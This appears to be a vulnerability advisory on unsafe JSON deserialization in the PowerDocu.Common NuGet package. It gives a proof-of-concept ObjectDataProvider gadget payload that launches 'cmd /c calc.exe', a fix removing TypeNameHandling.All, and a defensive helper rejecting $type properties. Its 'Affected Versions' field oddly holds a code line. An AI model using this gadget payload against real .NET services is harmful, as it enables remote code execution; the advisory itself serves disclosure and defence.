## Key Information

### Vulnerability Description

- **Type:** Remote Code Execution (RCE) via unsafe deserialization
- **Affected Package:** PowerDocu.Common (NuGet)
- **Affected Versions:**

```csharp
(flowJSON, settings).ToObject(typeof(object), _jsonSerializer);
```

### Proof of Concept (PoC)

Attackers can execute `calc.exe` on the host by crafting a specific JSON payload.

```json
{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": [ "cmd", "/c calc.exe" ]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}
```

### Mitigation Strategy

Remove `TypeNameHandling.All` from `FlowParser.cs` and `AppParser.cs` to prevent type-specified attacks.

```csharp
// OLD (Vulnerable)
var settings = new JsonSerializerSettings
{
    TypeNameHandling = TypeNameHandling.All,
    MaxDepth = 128
};

// NEW (Secure)
var settings = new JsonSerializerSettings
{
    MaxDepth = 128
};
```
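
As a defense-in-depth complement to the settings change, the following added example (not PowerDocu code) inspects untrusted JSON with LINQ to JSON, which builds `JToken` nodes without resolving .NET types, and refuses any document that carries a `$type` property. The class name `TypeDirectiveGuard`, its methods and the sample documents are hypothetical, and it assumes legitimate flow and app definitions never contain `$type`.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;

// Added example: hypothetical helper, not part of PowerDocu.
public static class TypeDirectiveGuard
{
    // Parses into a JToken tree only; no JsonSerializer and no type resolution is involved.
    public static JToken Parse(string json)
    {
        using var reader = new JsonTextReader(new StringReader(json)) { MaxDepth = 128 };
        return JToken.ReadFrom(reader);
    }

    // Lists (JSON path, declared type name) for every "$type" property in the tree.
    public static List<(string Path, string TypeName)> FindTypeDirectives(JToken root)
    {
        IEnumerable<JToken> nodes =
            (root as JContainer)?.Descendants() ?? Enumerable.Empty<JToken>();
        return nodes.OfType<JProperty>()
                    .Where(p => p.Name == "$type")
                    .Select(p => (p.Path, p.Value.ToString()))
                    .ToList();
    }

    // Assumption: legitimate input never carries "$type", so any hit is rejected and reported.
    public static JToken ParseOrReject(string json)
    {
        JToken root = Parse(json);
        var hits = FindTypeDirectives(root);
        if (hits.Count > 0)
            throw new InvalidDataException("Refusing JSON with type directives: " +
                string.Join("; ", hits.Select(h => $"{h.Path} -> {h.TypeName}")));
        return root;
    }

    public static void Main()
    {
        // Constructed sample inputs; the type name is a placeholder, not a real class.
        string clean = "{\"name\":\"MyFlow\",\"actions\":{\"step1\":{\"kind\":\"Http\"}}}";
        string tagged = "{\"name\":\"MyFlow\",\"actions\":{\"$type\":\"Example.Widget, ExampleAssembly\"}}";

        Console.WriteLine(FindTypeDirectives(Parse(clean)).Count);
        try { ParseOrReject(tagged); }
        catch (InvalidDataException ex) { Console.WriteLine(ex.Message); }
    }
}
```

Logging the rejected path and type name gives responders a record of which documents attempted to name a .NET type.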